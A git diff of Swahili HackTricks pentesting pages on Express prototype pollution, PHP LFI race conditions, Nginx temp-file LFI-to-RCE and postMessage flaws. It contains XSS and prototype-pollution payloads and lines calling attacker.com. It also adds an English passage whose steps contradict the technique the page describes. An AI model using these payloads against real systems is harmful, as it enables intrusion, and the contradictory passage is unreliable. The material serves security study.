* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -1,4 +1,4 @@
# Vifaa vya Uharibifu wa Prototipi za Express
# Vifaa vya Uharibifu wa Prototype wa Express
<details>
@ -9,16 +9,16 @@ Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa **huduma za bure** za kuangalia ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji iliyochangiwa na **dark-web** inayotoa **huduma za bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba habari.
@ -34,7 +34,7 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
### Badilisha aina ya yaliyomo ya JSON kuwa HTML
Katika programu ya Express ikitumia **aina ya majibu ya yaliyomo ya JSON** na kufunua JSON:
Katika programu ya Express ikitumia **aina ya jibu la yaliyomo ya JSON** na kufunua JSON:
```javascript
app.use(bodyParser.json({type: 'application/json'}));
app.post('/', function(req, res){
@ -42,15 +42,15 @@ _.merge({}, req.body);
res.send(req.body);
});
```
Katika kesi hizi XSS kawaida haiwezekani na aina ya yaliyomo ya JSON. Walakini, kwa kuchafua prototype tunaweza **kuchanganya Express kutumikia jibu la HTML.** Udhaifu huu unategemea maombi kutumia **`res.send(obj)`** na kutumia parser ya mwili na aina ya yaliyomo ya application/json.
Katika kesi hizi XSS kawaida haiwezekani na aina ya yaliyomo ya JSON. Walakini, kwa kuchafua prototype tunaweza **kuchanganya Express kutumikia jibu la HTML.** Udhaifu huu unategemea maombi kutumia **`res.send(obj)`** na kutumia parser ya mwili na aina ya yaliyomo ya maombi/json.
```json
{"__proto__":{"_body":true,"body":"<script>evil()"}}
```
Kwa **kuichafua** mali za **`body`** na **`_body`**, inawezekana kusababisha **Express kutumikia aina ya yaliyomo ya HTML** na kufunua mali ya `_body`, ikisababisha XSS iliyohifadhiwa.
Kwa **kuichafua** mali za **`body`** na **`_body`**, niwezekana kusababisha **Express kutumikia aina ya yaliyomo ya HTML** na kufunua mali ya `_body`, ikisababisha XSS iliyohifadhiwa.
### Toa UTF7
Inawezekana kufanya express **itoa yaliyomo ya UTF-7 na**:
Inawezekana kufanya express **kutoa yaliyomo ya UTF-7 pamoja na**:
```json
{"__proto__":{"content-type": "application/json; charset=utf-7"}}
```
@ -62,13 +62,13 @@ PP ifuatayo itafanya sifa ndani ya JSON kuwa na nafasi ya ziada ambayo haitahari
```json
{"__proto__":{"json spaces": " "}}
```
Kisha JSON iliyorudishwa itaonekana kama:
Kisha JSON iliyorejelewa itaonekana kama:
```json
{"foo": "bar"} -- Note the extra space
```
### Vichwa vilivyofunuliwa
### Vichwa vya Kufichua
Kifaa cha PP kinachofuata kitafanya server itume tena kichwa cha HTTP: **`Access-Control-Expose_headers: foo`**
Kifaa cha PP kinachofuata kitafanya server itume nyuma kichwa cha HTTP: **`Access-Control-Expose_headers: foo`**
```json
{"__proto__":{"exposedHeaders":["foo"]}}
```
@ -76,7 +76,7 @@ Inahitaji **moduli ya CORS iwe imewekwa**
### **Mbinu ya OPTIONS**
Kwa mzigo wa kufuata, ni **inawezekana kuficha mbinu kutoka kwa jibu la OPTIONS**:
Kwa mzigo wa kufuatia, ni **kupatikana kuficha mbinu kutoka kwa jibu la OPTIONS**:
```javascript
// Original reponse: POST,GET,HEAD
@ -91,29 +91,29 @@ Inawezekana kubadilisha **kodi ya hali iliyorudishwa** kwa kutumia mzigo wa PP u
```json
{"__proto__":{"status":510}}
```
### Kosa
### Hitilafu
Wakati unapoweka kwa kigezo na kitu cha msingi kama herufi, inazalisha **operesheni ya no-op kwa sababu kigezo lazima kiwe kitu**. Ikiwa unajaribu kuweka kigezo cha kitu kwa `Object.prototype` yenyewe, hii itasababisha **kutupwa kwa kosa**. Tunaweza kutumia tabia hizi mbili kugundua ikiwa **uchafuzi wa kigezo ulifanikiwa**:
Wakati unapoweka kwa kielelezo na kitu cha msingi kama herufi, inazalisha **operesheni ya no-op kwa sababu kielelezo lazima kiwe kitu**. Ikiwa unajaribu kuweka kielelezo cha kitu kwa `Object.prototype` yenyewe, hii italeta **kutupia kipeperushi**. Tunaweza kutumia tabia hizi mbili kugundua ikiwa **uchafuzi wa kielelezo ulifanikiwa**:
```javascript
({}).__proto__.__proto__={}//throws type exception
({}).__proto__.__proto__="x"//no-op does not throw exception
```
### Thamani Iliyorejeshwa
### Thamani Iliyorudishwa
Wakati programu inajumuisha kitu katika majibu yake, kuunda sifa na **jina lisilo la kawaida pamoja na `__proto__`** inaweza kuwa na manufaa. Hasa, ikiwa **sifa lisilo la kawaida pekee ndio inayorejeshwa** katika majibu, hii inaweza kuashiria udhaifu wa programu:
Wakati programu inajumuisha kitu katika majibu yake, kuunda sifa na **jina lisilo la kawaida pamoja na `__proto__`** inaweza kuwa ya kuelimisha. Hasa, ikiwa **sifa lisilo la kawaida pekee ndio inayorudishwa** katika majibu, hii inaweza kuashiria udhaifu wa programu:
```json
{"unusualName":"value","__proto__":"test"}
```
Zaidi ya hayo, katika hali ambapo maktaba kama Lodash inatumika, kuweka mali kwa njia ya uchafuzi wa prototype (PP) na moja kwa moja ndani ya kitu hutoa njia nyingine ya uchunguzi. Ikiwa mali kama hiyo haipo kwenye jibu, inaashiria kuwa Lodash inathibitisha uwepo wa mali katika kitu cha lengo kabla ya kufanya ushirikiano:
Zaidi, katika hali ambapo maktaba kama Lodash inatumika, kuweka mali kwa njia ya uchafuzi wa prototype (PP) na moja kwa moja ndani ya kitu hutoa njia nyingine ya uchunguzi. Ikiwa mali kama hiyo haipo kwenye jibu, inaashiria kuwa Lodash inathibitisha uwepo wa mali katika kitu cha lengo kabla ya kuiunganisha:
```javascript
{"__proto__":{"a":"value1"},"a":"value2","b":"value3"}
// If 'b' is the only property reflected, this indicates prototype pollution in Lodash
```
## Mambo Mbalimbali
## Vinginevyo
### Ruhusu Dots
Kuna chaguo katika Express ambalo linakuruhusu **kuunda vitu kutoka kwa paramita za mfuatilio wa string**.\
Kuna chaguo katika Express ambalo linakuruhusu **kuunda vitu kutoka kwa paramita za mfuatano wa kutafuta**.\
Unaweza kuitumia kwa hakika katika mlolongo wa makosa kufaidika na **udhaifu wa uchafuzi wa prototype**.
```json
{"__proto__":{"allowDots":true}}
@ -125,15 +125,15 @@ Unaweza kuitumia kwa hakika katika mlolongo wa makosa kufaidika na **udhaifu wa
* [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za wizi wa habari.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** kwa:
{% embed url="https://whiteintel.io" %}
@ -147,6 +147,6 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

View file

@ -1,6 +1,6 @@
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
@ -8,17 +8,17 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
@ -34,7 +34,7 @@ Hii inamaanisha kwamba wito kama huu:
```php
file_get_contents("compress.zlib://http://attacker.com/file")
```
Utatuma ombi ukiomba http://attacker.com/file, kisha server inaweza kujibu ombi hilo na jibu halali la HTTP, kuweka uhusiano wazi, na kutuma data ziada baadaye ambayo pia itaandikwa kwenye faili.
Utatuma ombi ukiomba http://attacker.com/file, kisha server inaweza kujibu ombi hilo na jibu sahihi la HTTP, kuendelea kuweka uhusiano wazi, na kutuma data ziada baadaye ambayo itaandikwa pia kwenye faili.
Unaweza kuona habari hiyo katika sehemu hii ya msimbo wa php-src katika main/streams/cast.c:
```c
@ -48,21 +48,21 @@ if (flags & PHP_STREAM_PREFER_STDIO) {
```
## Mashindano ya Kukimbia hadi RCE
[**CTF hii**](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) ilishinduliwa kwa kutumia hila iliyopita.
[**CTF hii**](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) ilishinduliwa kwa kutumia hila iliyotangulia.
Mshambuliaji atafanya **seva ya mwathiriwa ifungue uhusiano ikisoma faili kutoka kwa seva za mshambuliaji** kwa kutumia itifaki ya **`compress.zlib`**.
**Wakati** huu wa **uhusiano** mshambuliaji atafanya **kuchota njia** ya faili ya muda iliyoundwa (inavuja na seva).
**Wakati** huu **uhusiano** ukiwepo mshambuliaji atafanya **kuvuja njia** ya faili ya muda iliyoundwa (inavuja na seva).
**Wakati** huo huo **uhusiano** ukiwa bado wazi, mshambuliaji atatumia LFI kwa **kupakia faili ya muda** ambayo anadhibiti.
**Wakati** huo **uhusiano** bado ukiwa wazi, mshambuliaji atatumia LFI kwa **kupakia faili ya muda** ambayo anadhibiti.
Hata hivyo, kuna ukaguzi kwenye seva ya wavuti ambao **unazuia kupakia faili zinazohusu `<?`**. Kwa hivyo, mshambuliaji atatumia **Hali ya Mashindano**. Katika uhusiano ambao bado uko wazi **mshambuliaji** atatuma mzigo wa PHP BAADA YA **wavuti** kuchunguza ikiwa faili ina herufi zilizopigwa marufuku lakini **KABLA haijapakia maudhui yake**.
Hata hivyo, kuna ukaguzi kwenye seva ya wavuti ambao **unazuia kupakia faili zinazohusu `<?`**. Kwa hivyo, mshambuliaji atatumia **Mashindano ya Kukimbia**. Katika uhusiano ambao bado uko wazi **mshambuliaji** atatuma mzigo wa PHP **BAADA YA** **wavuti** kuchunguza ikiwa faili ina herufi zilizopigwa marufuku lakini **KABLA haijapakia maudhui yake**.
Kwa habari zaidi angalia maelezo ya Hali ya Mashindano na CTF katika [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)
Kwa habari zaidi angalia maelezo ya Mashindano ya Kukimbia na CTF katika [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumiwa na **dark-web** inayotoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
@ -80,7 +80,7 @@ Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

View file

@ -2,7 +2,7 @@
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
@ -10,17 +10,17 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi ya wizi wa habari.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
@ -28,7 +28,7 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
---
## Mpangilio wa Kudhaifu
## Mpangilio wa Kudukuziwa
**[Mfano kutoka https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)**
@ -50,9 +50,9 @@ chown -R 0:0 /tmp /var/tmp /var/lib/php/sessions
chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
...
```
Bahati nzuri PHP kwa sasa mara nyingi hutekelezwa kupitia PHP-FPM na Nginx. Nginx inatoa kipengele cha [kubadilisha mwili wa mteja](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) ambacho kinaweza kusahauliwa kwa urahisi ambapo itaandika faili za muda ikiwa mwili wa mteja (si tu kikomo cha posta) ni kubwa kuliko kizingiti fulani.
Bahati nzuri PHP kwa sasa mara nyingi hutekelezwa kupitia PHP-FPM na Nginx. Nginx inatoa kipengele cha [kubadilisha mwili wa mteja](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) ambacho kinaweza kusahauliwa kwa urahisi na kitaiandika faili za muda ikiwa mwili wa mteja (si mdogo kwa post) ni mkubwa kuliko kizingiti fulani.
Kipengele hiki kuruhusu LFIs kutumiwe bila njia nyingine yoyote ya kuunda faili, ikiwa Nginx inaendeshwa kama mtumiaji huyo huyo kama PHP (ambayo mara nyingi hufanywa kama www-data).
Kipengele hiki huruhusu LFIs kutumiwa bila njia nyingine yoyote ya kuunda faili, ikiwa Nginx inaendeshwa kama mtumiaji sawa na PHP (kawaida sana kama www-data).
Msimbo muhimu wa Nginx:
```c
@ -87,7 +87,7 @@ lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001
...
```
**Maelezo:**
Hakuna uwezekano wa moja kwa moja kujumuisha `/proc/34/fd/15` katika mfano huu kwa sababu PHP's `include` itatatua njia kuwa `/var/lib/nginx/body/0000001368 (deleted)` ambayo haipo kwenye mfumo wa faili. Kizuizi hiki kidogo kinaweza kuepukwa kwa njia ya kuelekeza kama vile: `/proc/self/fd/34/../../../34/fd/15` ambayo mwishowe itatekeleza maudhui ya faili iliyofutwa ya `/var/lib/nginx/body/0000001368`.
Haiwezekani kuingiza moja kwa moja `/proc/34/fd/15` katika mfano huu kwa sababu PHP's `include` itatatua njia kuwa `/var/lib/nginx/body/0000001368 (deleted)` ambayo haipo kwenye mfumo wa faili. Kizuizi hiki kidogo kinaweza kwa bahati nzuri kukiukwa kwa njia fulani ya kuelekeza kama: `/proc/self/fd/34/../../../34/fd/15` ambayo mwishowe itatekeleza maudhui ya faili iliyofutwa `/var/lib/nginx/body/0000001368`.
## Kufaidika Kamili
```python
@ -160,9 +160,15 @@ a.start()
```
### LFI to RCE via Nginx temp files
Njia hii inahusisha kuchapisha faili za muda za Nginx kwa kutumia njia ya kuingiza faili (LFI). Unaweza kutumia hili kufikia udhibiti wa kijijini wa seva ya Nginx. Kwa kufanya hivyo, unaweza kusoma faili za muda zilizoundwa na Nginx, na kuzitumia kutekeleza msimbo wako kwa njia ya mbali. Hii inaweza kusababisha kutekelezwa kwa msimbo mbaya kwenye seva ya lengwa.
1. If you find a Local File Inclusion (LFI) vulnerability on a server running Nginx, you might be able to escalate it to Remote Code Execution (RCE) by abusing Nginx temporary files.
2. Nginx stores temporary files in the `/var/lib/nginx` directory by default. If you have write permissions to this directory, you can create a malicious PHP file and then include it using the LFI vulnerability.
Kwa kawaida, faili za muda za Nginx zinapatikana kwenye saraka kama `/var/lib/nginx/tmp/client_body/`. Unaweza kutumia LFI kusoma faili hizi za muda, na kisha kutumia udhibiti huo kutekeleza msimbo wako kwa njia ya mbali. Kumbuka kwamba mbinu hii inahitaji ufikiaji wa awali wa LFI kwenye seva ya Nginx.
3. To exploit this, first, create a malicious PHP file with your payload. Next, find the temporary file created by Nginx when accessing a PHP file. This file's name will be something like `0000000001`.
4. Write your payload to this temporary file using the LFI vulnerability. Then, access the PHP file through the LFI vulnerability to execute your code and achieve RCE.
5. Keep in mind that this technique requires write permissions to the Nginx temporary directory, which might not always be the case.
```
$ ./pwn.py 127.0.0.1 1337
[*] cpus: 2; pid_max: 32768
@ -297,13 +303,13 @@ read_file_multiprocess(requests_session, nginx_pids)
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malwares za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na zisizo za habari za kuiba.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
@ -311,14 +317,14 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -1,6 +1,6 @@
# Madokezo ya PostMessage
# Mapungufu ya PostMessage
## Madokezo ya PostMessage
## Mapungufu ya PostMessage
<details>
@ -16,13 +16,13 @@ Njia nyingine za kusaidia HackTricks:
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wamedukuliwa na **malware za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
@ -30,7 +30,7 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
---
## Tuma **PostMessage**
## Tuma **Ujumbe wa PostMessage**
**PostMessage** hutumia kazi ifuatayo kutuma ujumbe:
```bash
@ -59,13 +59,13 @@ win = open('URL-with-iframe-inside', 'hack', 'width=800,height=300,top=500');
win[0].postMessage('{"__proto__":{"isAdmin":True}}', '*')
```
Tafadhali kumbuka kwamba **targetOrigin** inaweza kuwa '\*' au URL kama _https://company.com._\
Katika **skenario ya pili**, **ujumbe unaweza kutumwa tu kwa kikoa hicho** (hata kama asili ya kitu cha dirisha ni tofauti).\
Katika **skenario ya pili**, **ujumbe unaweza kutumwa kwa kikoa hicho tu** (hata kama asili ya kitu cha dirisha ni tofauti).\
Ikiwa **alama ya joker** inatumika, **ujumbe unaweza kutumwa kwa kikoa chochote**, na utatumwa kwa asili ya kitu cha Dirisha.
### Kuvamia iframe & alama ya joker katika **targetOrigin**
Kama ilivyoelezwa katika [**ripoti hii**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) ikiwa utapata ukurasa ambao unaweza **kuingizwa** (bila ulinzi wa `X-Frame-Header`) na ambao unatuma ujumbe wa **hisia** kupitia **postMessage** ukitumia **alama ya joker** (\*), unaweza **kubadilisha** **asili** ya **iframe** na **kuvuja** ujumbe wa **hisia** kwenda kwa kikoa kinachodhibitiwa na wewe.\
Tafadhali kumbuka kwamba ikiwa ukurasa unaweza kuingizwa lakini **targetOrigin** imewekwa kwa URL na sio kwa alama ya joker**, **hila hii haitafanya kazi**.
Kama ilivyoelezwa katika [**ripoti hii**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) ikiwa utapata ukurasa ambao unaweza **kuingizwa kwenye iframe** (bila ulinzi wa `X-Frame-Header`) na unatuma ujumbe wa **hisia** kupitia **postMessage** ukitumia **alama ya joker** (\*), unaweza **kubadilisha** **asili** ya **iframe** na **kuvuja** ujumbe wa **hisia** kwenda kwa kikoa kinachodhibitiwa na wewe.\
Tafadhali kumbuka kwamba ikiwa ukurasa unaweza kuingizwa kwenye iframe lakini **targetOrigin** imewekwa kwa URL na sio kwa alama ya joker, **hila hii haitafanya kazi**.
```markup
<html>
<iframe src="https://docs.google.com/document/ID" />
@ -82,7 +82,7 @@ window.frames[0].frame[0][2].location="https://attacker.com/exploit.html";
```
